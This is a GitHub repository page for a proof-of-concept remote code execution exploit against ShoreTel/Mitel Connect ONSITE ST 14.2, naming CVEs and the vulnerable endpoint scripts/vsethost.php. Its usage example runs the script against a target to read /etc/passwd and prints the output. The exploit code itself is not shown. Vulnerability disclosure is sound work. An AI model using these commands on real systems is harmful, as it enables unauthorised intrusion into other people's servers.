Skip to content

twosevenzero/shoretel-mitel-rce

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
 
 
 
 

ShoreTel / Mitel Remote Code Execution

Issue Explanation

There are multiple vulnerabilities in ShoreTel/Mitel Connect ONSITE ST 14.2 which, when chained together, result in remote code execution.

Usage Example

Not sure this is really needed but I’ll include it anyway.

# ./shoretel_rce.rb https://domain.com/ "cat /etc/passwd"
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
<-- SNIP -->

Caveat

I had access to a single device during the development of this PoC. As such, your system paths may be different and you may need to edit this script to fit your needs.

Keywords for Search Engines

I am just adding this section to assist other people who are looking for an exploit.

  • ShoreTel Version 19.49.5200.0 GA27 GA28
  • CVE-2018-5782 (maybe)
  • CVE-2017-16251 (maybe)
  • ShoreTel Connect ONSITE ST 14.2 Remote Code Execution
  • scripts/vsethost.php

About

Remote Code Execution on ShoreTel/Mitel CONNECT Onsite ST 14.2

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages